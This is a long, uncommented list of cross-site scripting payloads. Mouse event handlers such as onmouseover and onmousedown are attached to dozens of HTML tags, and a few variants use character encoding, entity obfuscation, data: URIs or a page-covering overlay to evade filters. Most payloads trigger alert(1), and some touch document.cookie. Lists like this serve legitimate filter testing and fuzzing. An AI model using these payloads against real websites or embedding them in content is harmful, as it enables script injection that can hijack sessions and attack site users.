<image onmouseenter="alert(1)">test</image>
<image onmouseleave="alert(1)">test</image>
<image onmousemove="alert(1)">test</image>
<image onmouseout="alert(1)">test</image>
<image onmouseover="alert(1)">test</image>
<image onmouseup="alert(1)">test</image>
<image onmousewheel=alert(1)>requires scrolling
<image2 onmousedown="alert(1)">test</image2>
<image2 onmouseenter="alert(1)">test</image2>
<image2 onmouseleave="alert(1)">test</image2>
<image2 onmousemove="alert(1)">test</image2>
<image2 onmouseout="alert(1)">test</image2>
<image2 onmouseover="alert(1)">test</image2>
<image2 onmouseup="alert(1)">test</image2>
<image2 onmousewheel=alert(1)>requires scrolling
<image3 onmousedown="alert(1)">test</image3>
<image3 onmouseenter="alert(1)">test</image3>
<image3 onmouseleave="alert(1)">test</image3>
<image3 onmousemove="alert(1)">test</image3>
<image3 onmouseout="alert(1)">test</image3>
<image3 onmouseover="alert(1)">test</image3>
<image3 onmouseup="alert(1)">test</image3>
<image3 onmousewheel=alert(1)>requires scrolling
<img id=XSS SRC="blah"onmouseover="alert('XSS');">
<img id=XSS SRC="blah>"onmouseover="alert('XSS');">
<img onmousedown="alert(1)">test</img>
<img onmouseenter="alert(1)">test</img>
<img onmouseleave="alert(1)">test</img>
<img onmousemove="alert(1)">test</img>
<img onmouseout="alert(1)">test</img>
<IMG onmouseover="alert('xxs')">
<img onmouseover="alert(1)">test</img>
<img onmouseup="alert(1)">test</img>
<img onmousewheel=alert(1)>requires scrolling
<IMG SRC= onmouseover="alert('xxs')">
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
<img2 onmousedown="alert(1)">test</img2>
<img2 onmouseenter="alert(1)">test</img2>
<img2 onmouseleave="alert(1)">test</img2>
<img2 onmousemove="alert(1)">test</img2>
<img2 onmouseout="alert(1)">test</img2>
<img2 onmouseover="alert(1)">test</img2>
<img2 onmouseup="alert(1)">test</img2>
<img2 onmousewheel=alert(1)>requires scrolling
<input onmousedown="alert(1)">test</input>
<input onmouseenter="alert(1)">test</input>
<input onmouseleave="alert(1)">test</input>
<input onmousemove="alert(1)">test</input>
<input onmouseout="alert(1)">test</input>
<input onmouseover="alert(1)">test</input>
<input onmouseup="alert(1)">test</input>
<input onmousewheel=alert(1)>requires scrolling
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<input2 onmousedown="alert(1)">test</input2>
<input2 onmouseenter="alert(1)">test</input2>
<input2 onmouseleave="alert(1)">test</input2>
<input2 onmousemove="alert(1)">test</input2>
<input2 onmouseout="alert(1)">test</input2>
<input2 onmouseover="alert(1)">test</input2>
<input2 onmouseup="alert(1)">test</input2>
<input2 onmousewheel=alert(1)>requires scrolling
<input3 onmousedown="alert(1)">test</input3>
<input3 onmouseenter="alert(1)">test</input3>
<input3 onmouseleave="alert(1)">test</input3>
<input3 onmousemove="alert(1)">test</input3>
<input3 onmouseout="alert(1)">test</input3>
<input3 onmouseover="alert(1)">test</input3>
<input3 onmouseup="alert(1)">test</input3>
<input3 onmousewheel=alert(1)>requires scrolling
<input4 onmousedown="alert(1)">test</input4>
<input4 onmouseenter="alert(1)">test</input4>
<input4 onmouseleave="alert(1)">test</input4>
<input4 onmousemove="alert(1)">test</input4>
<input4 onmouseout="alert(1)">test</input4>
<input4 onmouseover="alert(1)">test</input4>
<input4 onmouseup="alert(1)">test</input4>
<input4 onmousewheel=alert(1)>requires scrolling
<ins onmousedown="alert(1)">test</ins>
<ins onmouseenter="alert(1)">test</ins>
<ins onmouseleave="alert(1)">test</ins>
<ins onmousemove="alert(1)">test</ins>
<ins onmouseout="alert(1)">test</ins>
<ins onmouseover="alert(1)">test</ins>
<ins onmouseup="alert(1)">test</ins>
<ins onmousewheel=alert(1)>requires scrolling
<isindex onmousedown="alert(1)">test</isindex>
<isindex onmouseenter="alert(1)">test</isindex>
<isindex onmouseleave="alert(1)">test</isindex>
<isindex onmousemove="alert(1)">test</isindex>
<isindex onmouseout="alert(1)">test</isindex>
<isindex onmouseover="alert(1)">test</isindex>
<isindex onmouseup="alert(1)">test</isindex>
<isindex onmousewheel=alert(1)>requires scrolling
<kbd onmousedown="alert(1)">test</kbd>
<kbd onmouseenter="alert(1)">test</kbd>
<kbd onmouseleave="alert(1)">test</kbd>
<kbd onmousemove="alert(1)">test</kbd>
<kbd onmouseout="alert(1)">test</kbd>
<kbd onmouseover="alert(1)">test</kbd>
<kbd onmouseup="alert(1)">test</kbd>
<kbd onmousewheel=alert(1)>requires scrolling
<keygen onmousedown="alert(1)">test</keygen>
<keygen onmouseenter="alert(1)">test</keygen>
<keygen onmouseleave="alert(1)">test</keygen>
<keygen onmousemove="alert(1)">test</keygen>
<keygen onmouseout="alert(1)">test</keygen>
<keygen onmouseover="alert(1)">test</keygen>
<keygen onmouseup="alert(1)">test</keygen>
<keygen onmousewheel=alert(1)>requires scrolling
<label onmousedown="alert(1)">test</label>
<label onmouseenter="alert(1)">test</label>
<label onmouseleave="alert(1)">test</label>
<label onmousemove="alert(1)">test</label>
<label onmouseout="alert(1)">test</label>
<label onmouseover="alert(1)">test</label>
<label onmouseup="alert(1)">test</label>
<label onmousewheel=alert(1)>requires scrolling
<legend onmousedown="alert(1)">test</legend>
<legend onmouseenter="alert(1)">test</legend>
<legend onmouseleave="alert(1)">test</legend>
<legend onmousemove="alert(1)">test</legend>
<legend onmouseout="alert(1)">test</legend>
<legend onmouseover="alert(1)">test</legend>
<legend onmouseup="alert(1)">test</legend>
<legend onmousewheel=alert(1)>requires scrolling
<li onmousedown="alert(1)">test</li>
<li onmouseenter="alert(1)">test</li>
<li onmouseleave="alert(1)">test</li>
<li onmousemove="alert(1)">test</li>
<li onmouseout="alert(1)">test</li>
<li onmouseover="alert(1)">test</li>
<li onmouseup="alert(1)">test</li>
<li onmousewheel=alert(1)>requires scrolling
<link onmousedown="alert(1)">test</link>
<link onmouseenter="alert(1)">test</link>
<link onmouseleave="alert(1)">test</link>
<link onmousemove="alert(1)">test</link>
<link onmouseout="alert(1)">test</link>
<link onmouseover="alert(1)">test</link>
<link onmouseup="alert(1)">test</link>
<link onmousewheel=alert(1)>requires scrolling
<listing onmousedown="alert(1)">test</listing>
<listing onmouseenter="alert(1)">test</listing>
<listing onmouseleave="alert(1)">test</listing>
<listing onmousemove="alert(1)">test</listing>
<listing onmouseout="alert(1)">test</listing>
<listing onmouseover="alert(1)">test</listing>
<listing onmouseup="alert(1)">test</listing>
<listing onmousewheel=alert(1)>requires scrolling
<main onmousedown="alert(1)">test</main>
<main onmouseenter="alert(1)">test</main>
<main onmouseleave="alert(1)">test</main>
<main onmousemove="alert(1)">test</main>
<main onmouseout="alert(1)">test</main>
<main onmouseover="alert(1)">test</main>
<main onmouseup="alert(1)">test</main>
<main onmousewheel=alert(1)>requires scrolling
<map onmousedown="alert(1)">test</map>
<map onmouseenter="alert(1)">test</map>
<map onmouseleave="alert(1)">test</map>
<map onmousemove="alert(1)">test</map>
<map onmouseout="alert(1)">test</map>
<map onmouseover="alert(1)">test</map>
<map onmouseup="alert(1)">test</map>
<map onmousewheel=alert(1)>requires scrolling
<mark onmousedown="alert(1)">test</mark>
<mark onmouseenter="alert(1)">test</mark>
<mark onmouseleave="alert(1)">test</mark>
<mark onmousemove="alert(1)">test</mark>
<mark onmouseout="alert(1)">test</mark>
<mark onmouseover="alert(1)">test</mark>
<mark onmouseup="alert(1)">test</mark>
<mark onmousewheel=alert(1)>requires scrolling
<marquee onmousedown="alert(1)">test</marquee>
<marquee onmouseenter="alert(1)">test</marquee>
<marquee onmouseleave="alert(1)">test</marquee>
<marquee onmousemove="alert(1)">test</marquee>
<marquee onmouseout="alert(1)">test</marquee>
<marquee onmouseover="alert(1)">test</marquee>
<marquee onmouseup="alert(1)">test</marquee>
<marquee onmousewheel=alert(1)>requires scrolling
<mArquee onStart=[~[onmouseleave(([[(alert(1))]]))]] ]
<menu onmousedown="alert(1)">test</menu>
<menu onmouseenter="alert(1)">test</menu>
<menu onmouseleave="alert(1)">test</menu>
<menu onmousemove="alert(1)">test</menu>
<menu onmouseout="alert(1)">test</menu>
<menu onmouseover="alert(1)">test</menu>
<menu onmouseup="alert(1)">test</menu>
<menu onmousewheel=alert(1)>requires scrolling
<menuitem onmousedown="alert(1)">test</menuitem>
<menuitem onmouseenter="alert(1)">test</menuitem>
<menuitem onmouseleave="alert(1)">test</menuitem>
<menuitem onmousemove="alert(1)">test</menuitem>
<menuitem onmouseout="alert(1)">test</menuitem>
<menuitem onmouseover="alert(1)">test</menuitem>
<menuitem onmouseup="alert(1)">test</menuitem>
<menuitem onmousewheel=alert(1)>requires scrolling
<meta onmousedown="alert(1)">test</meta>
<meta onmouseenter="alert(1)">test</meta>
<meta onmouseleave="alert(1)">test</meta>
<meta onmousemove="alert(1)">test</meta>
<meta onmouseout="alert(1)">test</meta>
<meta onmouseover="alert(1)">test</meta>
<meta onmouseup="alert(1)">test</meta>
<meta onmousewheel=alert(1)>requires scrolling
<meter onmousedown="alert(1)">test</meter>
<meter onmouseenter="alert(1)">test</meter>
<meter onmouseleave="alert(1)">test</meter>
<meter onmousemove="alert(1)">test</meter>
<meter onmouseout="alert(1)">test</meter>
<meter onmouseover="alert(1)"
<meter onmouseover="alert(1)">test</meter>
<meter onmouseup="alert(1)">test</meter>
<meter onmousewheel=alert(1)>requires scrolling
<multicol onmousedown="alert(1)">test</multicol>
<multicol onmouseenter="alert(1)">test</multicol>
<multicol onmouseleave="alert(1)">test</multicol>
<multicol onmousemove="alert(1)">test</multicol>
<multicol onmouseout="alert(1)">test</multicol>
<multicol onmouseover="alert(1)">test</multicol>
<multicol onmouseup="alert(1)">test</multicol>
<multicol onmousewheel=alert(1)>requires scrolling
<nav onmousedown="alert(1)">test</nav>
<nav onmouseenter="alert(1)">test</nav>
<nav onmouseleave="alert(1)">test</nav>
<nav onmousemove="alert(1)">test</nav>
<nav onmouseout="alert(1)">test</nav>
<nav onmouseover="alert(1)">test</nav>
<nav onmouseup="alert(1)">test</nav>
<nav onmousewheel=alert(1)>requires scrolling
<nextid onmousedown="alert(1)">test</nextid>
<nextid onmouseenter="alert(1)">test</nextid>
<nextid onmouseleave="alert(1)">test</nextid>
<nextid onmousemove="alert(1)">test</nextid>
<nextid onmouseout="alert(1)">test</nextid>
<nextid onmouseover="alert(1)">test</nextid>
<nextid onmouseup="alert(1)">test</nextid>
<nextid onmousewheel=alert(1)>requires scrolling
<nobr onmousedown="alert(1)">test</nobr>
<nobr onmouseenter="alert(1)">test</nobr>
<nobr onmouseleave="alert(1)">test</nobr>
<nobr onmousemove="alert(1)">test</nobr>
<nobr onmouseout="alert(1)">test</nobr>
<nobr onmouseover="alert(1)">test</nobr>
<nobr onmouseup="alert(1)">test</nobr>
<nobr onmousewheel=alert(1)>requires scrolling
<noembed onmousedown="alert(1)">test</noembed>
<noembed onmouseenter="alert(1)">test</noembed>
<noembed onmouseleave="alert(1)">test</noembed>
<noembed onmousemove="alert(1)">test</noembed>
<noembed onmouseout="alert(1)">test</noembed>
<noembed onmouseover="alert(1)">test</noembed>
<noembed onmouseup="alert(1)">test</noembed>
<noembed onmousewheel=alert(1)>requires scrolling
<noframes onmousedown="alert(1)">test</noframes>
<noframes onmouseenter="alert(1)">test</noframes>
<noframes onmouseleave="alert(1)">test</noframes>
<noframes onmousemove="alert(1)">test</noframes>
<noframes onmouseout="alert(1)">test</noframes>
<noframes onmouseover="alert(1)">test</noframes>
<noframes onmouseup="alert(1)">test</noframes>
<noframes onmousewheel=alert(1)>requires scrolling
<noscript onmousedown="alert(1)">test</noscript>
<noscript onmouseenter="alert(1)">test</noscript>
<noscript onmouseleave="alert(1)">test</noscript>
<noscript onmousemove="alert(1)">test</noscript>
<noscript onmouseout="alert(1)">test</noscript>
<noscript onmouseover="alert(1)">test</noscript>
<noscript onmouseup="alert(1)">test</noscript>
<noscript onmousewheel=alert(1)>requires scrolling
<object onmousedown="alert(1)">test</object>
<object onmouseenter="alert(1)">test</object>
<object onmouseleave="alert(1)">test</object>
<object onmousemove="alert(1)">test</object>
<object onmouseout="alert(1)">test</object>
<object onmouseover="alert(1)">test</object>
<object onmouseup="alert(1)">test</object>
<object onmousewheel=alert(1)>requires scrolling
<ol onmousedown="alert(1)">test</ol>
<ol onmouseenter="alert(1)">test</ol>
<ol onmouseleave="alert(1)">test</ol>
<ol onmousemove="alert(1)">test</ol>
<ol onmouseout="alert(1)">test</ol>
<ol onmouseover="alert(1)">test</ol>
<ol onmouseup="alert(1)">test</ol>
<ol onmousewheel=alert(1)>requires scrolling
<optgroup onmousedown="alert(1)">test</optgroup>
<optgroup onmouseenter="alert(1)">test</optgroup>
<optgroup onmouseleave="alert(1)">test</optgroup>
<optgroup onmousemove="alert(1)">test</optgroup>
<optgroup onmouseout="alert(1)">test</optgroup>
<optgroup onmouseover="alert(1)">test</optgroup>
<optgroup onmouseup="alert(1)">test</optgroup>
<optgroup onmousewheel=alert(1)>requires scrolling
<option onmousedown="alert(1)">test</option>
<option onmouseenter="alert(1)">test</option>
<option onmouseleave="alert(1)">test</option>
<option onmousemove="alert(1)">test</option>
<option onmouseout="alert(1)">test</option>
<option onmouseover="alert(1)">test</option>
<option onmouseup="alert(1)">test</option>
<option onmousewheel=alert(1)>requires scrolling
<output onmousedown="alert(1)">test</output>
<output onmouseenter="alert(1)">test</output>
<output onmouseleave="alert(1)">test</output>
<output onmousemove="alert(1)">test</output>
<output onmouseout="alert(1)">test</output>
<output onmouseover="alert(1)">test</output>
<output onmouseup="alert(1)">test</output>
<output onmousewheel=alert(1)>requires scrolling
<p onmousedown="alert(1)">test</p>
<p onmouseenter="alert(1)">test</p>
<p onmouseleave="alert(1)">test</p>
<p onmousemove="alert(1)">test</p>
<p onmouseout="alert(1)">test</p>
<p onmouseover="alert(1)">test</p>
<p onmouseup="alert(1)">test</p>
<p onmousewheel=alert(1)>requires scrolling
<p/%0Aonmouseover%0A=%0Aconfirm(1)>xss
<param onmousedown="alert(1)">test</param>
<param onmouseenter="alert(1)">test</param>
<param onmouseleave="alert(1)">test</param>
<param onmousemove="alert(1)">test</param>
<param onmouseout="alert(1)">test</param>
<param onmouseover="alert(1)">test</param>
<param onmouseup="alert(1)">test</param>
<param onmousewheel=alert(1)>requires scrolling
<picture onmousedown="alert(1)">test</picture>
<picture onmouseenter="alert(1)">test</picture>
<picture onmouseleave="alert(1)">test</picture>
<picture onmousemove="alert(1)">test</picture>
<picture onmouseout="alert(1)">test</picture>
<picture onmouseover="alert(1)">test</picture>
<picture onmouseup="alert(1)">test</picture>
<picture onmousewheel=alert(1)>requires scrolling
<plaintext onmousedown="alert(1)">test</plaintext>
<plaintext onmouseenter="alert(1)">test</plaintext>
<plaintext onmouseleave="alert(1)">test</plaintext>
<plaintext onmousemove="alert(1)">test</plaintext>
<plaintext onmouseout="alert(1)">test</plaintext>
<plaintext onmouseover="alert(1)">test</plaintext>
<plaintext onmouseup="alert(1)">test</plaintext>
<plaintext onmousewheel=alert(1)>requires scrolling
<plaintext/onmousemove=prompt(1)>xss
<pre onmousedown="alert(1)">test</pre>
<pre onmouseenter="alert(1)">test</pre>
<pre onmouseleave="alert(1)">test</pre>
<pre onmousemove="alert(1)">test</pre>
<pre onmouseout="alert(1)">test</pre>
<pre onmouseover="alert(1)">test</pre>
<pre onmouseup="alert(1)">test</pre>
<pre onmousewheel=alert(1)>requires scrolling
<progress onmousedown="alert(1)">test</progress>
<progress onmouseenter="alert(1)">test</progress>
<progress onmouseleave="alert(1)">test</progress>
<progress onmousemove="alert(1)">test</progress>
<progress onmouseout="alert(1)">test</progress>
<progress onmouseover="alert(1)">test</progress>
<progress onmouseup="alert(1)">test</progress>
<progress onmousewheel=alert(1)>requires scrolling
<q onmousedown="alert(1)">test</q>
<q onmouseenter="alert(1)">test</q>
<q onmouseleave="alert(1)">test</q>
<q onmousemove="alert(1)">test</q>
<q onmouseout="alert(1)">test</q>
<q onmouseover="alert(1)">test</q>
<q onmouseup="alert(1)">test</q>
<q onmousewheel=alert(1)>requires scrolling
<rb onmousedown="alert(1)">test</rb>
<rb onmouseenter="alert(1)">test</rb>
<rb onmouseleave="alert(1)">test</rb>
<rb onmousemove="alert(1)">test</rb>
<rb onmouseout="alert(1)">test</rb>
<rb onmouseover="alert(1)">test</rb>
<rb onmouseup="alert(1)">test</rb>
<rb onmousewheel=alert(1)>requires scrolling
<rp onmousedown="alert(1)">test</rp>
<rp onmouseenter="alert(1)">test</rp>
<rp onmouseleave="alert(1)">test</rp>
<rp onmousemove="alert(1)">test</rp>
<rp onmouseout="alert(1)">test</rp>
<rp onmouseover="alert(1)">test</rp>
<rp onmouseup="alert(1)">test</rp>
<rp onmousewheel=alert(1)>requires scrolling
<rt onmousedown="alert(1)">test</rt>
<rt onmouseenter="alert(1)">test</rt>
<rt onmouseleave="alert(1)">test</rt>
<rt onmousemove="alert(1)">test</rt>
<rt onmouseout="alert(1)">test</rt>
<rt onmouseover="alert(1)">test</rt>
<rt onmouseup="alert(1)">test</rt>
<rt onmousewheel=alert(1)>requires scrolling
<rtc onmousedown="alert(1)">test</rtc>
<rtc onmouseenter="alert(1)">test</rtc>
<rtc onmouseleave="alert(1)">test</rtc>
<rtc onmousemove="alert(1)">test</rtc>
<rtc onmouseout="alert(1)">test</rtc>
<rtc onmouseover="alert(1)">test</rtc>
<rtc onmouseup="alert(1)">test</rtc>
<rtc onmousewheel=alert(1)>requires scrolling
<ruby onmousedown="alert(1)">test</ruby>
<ruby onmouseenter="alert(1)">test</ruby>
<ruby onmouseleave="alert(1)">test</ruby>
<ruby onmousemove="alert(1)">test</ruby>
<ruby onmouseout="alert(1)">test</ruby>
<ruby onmouseover="alert(1)">test</ruby>
<ruby onmouseup="alert(1)">test</ruby>
<ruby onmousewheel=alert(1)>requires scrolling
<s onmousedown="alert(1)">test</s>
<s onmouseenter="alert(1)">test</s>
<s onmouseleave="alert(1)">test</s>
<s onmousemove="alert(1)">test</s>
<s onmouseout="alert(1)">test</s>
<s onmouseover="alert(1)">test</s>
<s onmouseup="alert(1)">test</s>
<s onmousewheel=alert(1)>requires scrolling
<samp onmousedown="alert(1)">test</samp>
<samp onmouseenter="alert(1)">test</samp>
<samp onmouseleave="alert(1)">test</samp>
<samp onmousemove="alert(1)">test</samp>
<samp onmouseout="alert(1)">test</samp>
<samp onmouseover="alert(1)">test</samp>
<samp onmouseup="alert(1)">test</samp>
<samp onmousewheel=alert(1)>requires scrolling
<script onmousedown="alert(1)">test</script>
<script onmouseenter="alert(1)">test</script>
<script onmouseleave="alert(1)">test</script>
<script onmousemove="alert(1)">test</script>
<script onmouseout="alert(1)">test</script>
<script onmouseover="alert(1)">test</script>
<script onmouseup="alert(1)">test</script>
<script onmousewheel=alert(1)>requires scrolling
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x00 0070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"  onclick="alert(1)">x</button>
<section onmousedown="alert(1)">test</section>
<section onmouseenter="alert(1)">test</section>
<section onmouseleave="alert(1)">test</section>
<section onmousemove="alert(1)">test</section>
<section onmouseout="alert(1)">test</section>
<section onmouseover="alert(1)">test</section>
<section onmouseup="alert(1)">test</section>
<section onmousewheel=alert(1)>requires scrolling
<select onmousedown="alert(1)">test</select>
<select onmouseenter="alert(1)">test</select>
<select onmouseleave="alert(1)">test</select>
<select onmousemove="alert(1)">test</select>
<select onmouseout="alert(1)">test</select>
<select onmouseover="alert(1)">test</select>
<select onmouseup="alert(1)">test</select>
<select onmousewheel=alert(1)>requires scrolling
<set attributeName="onmouseover" to="alert(89)"/>
<set onmousedown="alert(1)">test</set>
<set onmouseenter="alert(1)">test</set>
<set onmouseleave="alert(1)">test</set>
<set onmousemove="alert(1)">test</set>
<set onmouseout="alert(1)">test</set>
<set onmouseover="alert(1)">test</set>
<set onmouseup="alert(1)">test</set>
<set onmousewheel=alert(1)>requires scrolling
<shadow onmousedown="alert(1)">test</shadow>
<shadow onmouseenter="alert(1)">test</shadow>
<shadow onmouseleave="alert(1)">test</shadow>
<shadow onmousemove="alert(1)">test</shadow>
<shadow onmouseout="alert(1)">test</shadow>
<shadow onmouseover="alert(1)">test</shadow>
<shadow onmouseup="alert(1)">test</shadow>
<shadow onmousewheel=alert(1)>requires scrolling
<slot onmousedown="alert(1)">test</slot>
<slot onmouseenter="alert(1)">test</slot>
<slot onmouseleave="alert(1)">test</slot>
<slot onmousemove="alert(1)">test</slot>
<slot onmouseout="alert(1)">test</slot>
<slot onmouseover="alert(1)">test</slot>
<slot onmouseup="alert(1)">test</slot>
<slot onmousewheel=alert(1)>requires scrolling
<small onmousedown="alert(1)">test</small>
<small onmouseenter="alert(1)">test</small>
<small onmouseleave="alert(1)">test</small>
<small onmousemove="alert(1)">test</small>
<small onmouseout="alert(1)">test</small>
<small onmouseover="alert(1)">test</small>
<small onmouseup="alert(1)">test</small>
<small onmousewheel=alert(1)>requires scrolling
<source onmousedown="alert(1)">test</source>
<source onmouseenter="alert(1)">test</source>
<source onmouseleave="alert(1)">test</source>
<source onmousemove="alert(1)">test</source>
<source onmouseout="alert(1)">test</source>
<source onmouseover="alert(1)">test</source>
<source onmouseup="alert(1)">test</source>
<source onmousewheel=alert(1)>requires scrolling
<spacer onmousedown="alert(1)">test</spacer>
<spacer onmouseenter="alert(1)">test</spacer>
<spacer onmouseleave="alert(1)">test</spacer>
<spacer onmousemove="alert(1)">test</spacer>
<spacer onmouseout="alert(1)">test</spacer>
<spacer onmouseover="alert(1)">test</spacer>
<spacer onmouseup="alert(1)">test</spacer>
<spacer onmousewheel=alert(1)>requires scrolling
<span onmousedown="alert(1)">test</span>
<span onmouseenter="alert(1)">test</span>
<span onmouseleave="alert(1)">test</span>
<span onmousemove="alert(1)">test</span>
<span onmouseout="alert(1)">test</span>
<span onmouseover="alert(1)">test</span>
<span onmouseup="alert(1)">test</span>
<span onmousewheel=alert(1)>requires scrolling
<span/onmouseover=confirm(1)>xss
<strike onmousedown="alert(1)">test</strike>
<strike onmouseenter="alert(1)">test</strike>
<strike onmouseleave="alert(1)">test</strike>
<strike onmousemove="alert(1)">test</strike>
<strike onmouseout="alert(1)">test</strike>
<strike onmouseover="alert(1)">test</strike>
<strike onmouseup="alert(1)">test</strike>
<strike onmousewheel=alert(1)>requires scrolling
<strong onmousedown="alert(1)">test</strong>
<strong onmouseenter="alert(1)">test</strong>
<strong onmouseleave="alert(1)">test</strong>
<strong onmousemove="alert(1)">test</strong>
<strong onmouseout="alert(1)">test</strong>
<strong onmouseover="alert(1)">test</strong>
<strong onmouseup="alert(1)">test</strong>
<strong onmousewheel=alert(1)>requires scrolling
<style onmousedown="alert(1)">test</style>
<style onmouseenter="alert(1)">test</style>
<style onmouseleave="alert(1)">test</style>
<style onmousemove="alert(1)">test</style>
<style onmouseout="alert(1)">test</style>
<style onmouseover="alert(1)">test</style>
<style onmouseup="alert(1)">test</style>
<style onmousewheel=alert(1)>requires scrolling
<sub onmousedown="alert(1)">test</sub>
<sub onmouseenter="alert(1)">test</sub>
<sub onmouseleave="alert(1)">test</sub>
<sub onmousemove="alert(1)">test</sub>
<sub onmouseout="alert(1)">test</sub>
<sub onmouseover="alert(1)">test</sub>
<sub onmouseup="alert(1)">test</sub>
<sub onmousewheel=alert(1)>requires scrolling
<summary onmousedown="alert(1)">test</summary>
<summary onmouseenter="alert(1)">test</summary>
<summary onmouseleave="alert(1)">test</summary>
<summary onmousemove="alert(1)">test</summary>
<summary onmouseout="alert(1)">test</summary>
<summary onmouseover="alert(1)">test</summary>
<summary onmouseup="alert(1)">test</summary>
<summary onmousewheel=alert(1)>requires scrolling
<sup onmousedown="alert(1)">test</sup>
<sup onmouseenter="alert(1)">test</sup>
<sup onmouseleave="alert(1)">test</sup>
<sup onmousemove="alert(1)">test</sup>
<sup onmouseout="alert(1)">test</sup>
<sup onmouseover="alert(1)">test</sup>
<sup onmouseup="alert(1)">test</sup>
<sup onmousewheel=alert(1)>requires scrolling
<svg onmousedown="alert(1)">test</svg>
<svg onmouseenter="alert(1)">test</svg>
<svg onmouseleave="alert(1)">test</svg>
<svg onmousemove="alert(1)">test</svg>
<svg onmouseout="alert(1)">test</svg>
<svg onmouseover="alert(1)">test</svg>
<svg onmouseup="alert(1)">test</svg>
<svg onmousewheel=alert(1)>requires scrolling
<table onmousedown="alert(1)">test</table>
<table onmouseenter="alert(1)">test</table>
<table onmouseleave="alert(1)">test</table>
<table onmousemove="alert(1)">test</table>
<table onmouseout="alert(1)">test</table>
<table onmouseover="alert(1)">test</table>
<table onmouseup="alert(1)">test</table>
<table onmousewheel=alert(1)>requires scrolling
<tbody onmousedown="alert(1)">test</tbody>
<tbody onmouseenter="alert(1)">test</tbody>
<tbody onmouseleave="alert(1)">test</tbody>
<tbody onmousemove="alert(1)">test</tbody>
<tbody onmouseout="alert(1)">test</tbody>
<tbody onmouseover="alert(1)">test</tbody>
<tbody onmouseup="alert(1)">test</tbody>
<tbody onmousewheel=alert(1)>requires scrolling
<td onmousedown="alert(1)">test</td>
<td onmouseenter="alert(1)">test</td>
<td onmouseleave="alert(1)">test</td>
<td onmousemove="alert(1)">test</td>
<td onmouseout="alert(1)">test</td>
<td onmouseover="alert(1)">test</td>
<td onmouseup="alert(1)">test</td>
<td onmousewheel=alert(1)>requires scrolling
<template onmousedown="alert(1)">test</template>
<template onmouseenter="alert(1)">test</template>
<template onmouseleave="alert(1)">test</template>
<template onmousemove="alert(1)">test</template>
<template onmouseout="alert(1)">test</template>
<template onmouseover="alert(1)">test</template>
<template onmouseup="alert(1)">test</template>
<template onmousewheel=alert(1)>requires scrolling
<textarea onmousedown="alert(1)">test</textarea>
<textarea onmouseenter="alert(1)">test</textarea>
<textarea onmouseleave="alert(1)">test</textarea>
<textarea onmousemove="alert(1)">test</textarea>
<textarea onmouseout="alert(1)">test</textarea>
<textarea onmouseover="alert(1)">test</textarea>
<textarea onmouseup="alert(1)">test</textarea>
<textarea onmousewheel=alert(1)>requires scrolling
<tfoot onmousedown="alert(1)">test</tfoot>
<tfoot onmouseenter="alert(1)">test</tfoot>
<tfoot onmouseleave="alert(1)">test</tfoot>
<tfoot onmousemove="alert(1)">test</tfoot>
<tfoot onmouseout="alert(1)">test</tfoot>
<tfoot onmouseover="alert(1)">test</tfoot>
<tfoot onmouseup="alert(1)">test</tfoot>
<tfoot onmousewheel=alert(1)>requires scrolling
<th onmousedown="alert(1)">test</th>
<th onmouseenter="alert(1)">test</th>
<th onmouseleave="alert(1)">test</th>
<th onmousemove="alert(1)">test</th>
<th onmouseout="alert(1)">test</th>
<th onmouseover="alert(1)">test</th>
<th onmouseup="alert(1)">test</th>
<th onmousewheel=alert(1)>requires scrolling
<thead onmousedown="alert(1)">test</thead>
<thead onmouseenter="alert(1)">test</thead>
<thead onmouseleave="alert(1)">test</thead>
<thead onmousemove="alert(1)">test</thead>
<thead onmouseout="alert(1)">test</thead>
<thead onmouseover="alert(1)">test</thead>
<thead onmouseup="alert(1)">test</thead>
<thead onmousewheel=alert(1)>requires scrolling
<time onmousedown="alert(1)">test</time>
<time onmouseenter="alert(1)">test</time>
<time onmouseleave="alert(1)">test</time>
<time onmousemove="alert(1)">test</time>
<time onmouseout="alert(1)">test</time>
<time onmouseover="alert(1)">test</time>
<time onmouseup="alert(1)">test</time>
<time onmousewheel=alert(1)>requires scrolling
<title onmousedown="alert(1)">test</title>
<title onmouseenter="alert(1)">test</title>
<title onmouseleave="alert(1)">test</title>
<title onmousemove="alert(1)">test</title>
<title onmouseout="alert(1)">test</title>
<title onmouseover="alert(1)">test</title>
<title onmouseup="alert(1)">test</title>
<title onmousewheel=alert(1)>requires scrolling
<tr onmousedown="alert(1)">test</tr>
<tr onmouseenter="alert(1)">test</tr>
<tr onmouseleave="alert(1)">test</tr>
<tr onmousemove="alert(1)">test</tr>
<tr onmouseout="alert(1)">test</tr>
<tr onmouseover="alert(1)">test</tr>
<tr onmouseup="alert(1)">test</tr>
<tr onmousewheel=alert(1)>requires scrolling
<track onmousedown="alert(1)">test</track>
<track onmouseenter="alert(1)">test</track>
<track onmouseleave="alert(1)">test</track>
<track onmousemove="alert(1)">test</track>
<track onmouseout="alert(1)">test</track>
<track onmouseover="alert(1)">test</track>
<track onmouseup="alert(1)">test</track>
<track onmousewheel=alert(1)>requires scrolling
<tt onmousedown="alert(1)">test</tt>
<tt onmouseenter="alert(1)">test</tt>
<tt onmouseleave="alert(1)">test</tt>
<tt onmousemove="alert(1)">test</tt>
<tt onmouseout="alert(1)">test</tt>
<tt onmouseover="alert(1)">test</tt>
<tt onmouseup="alert(1)">test</tt>
<tt onmousewheel=alert(1)>requires scrolling
<u onmousedown="alert(1)">test</u>
<u onmouseenter="alert(1)">test</u>
<u onmouseleave="alert(1)">test</u>
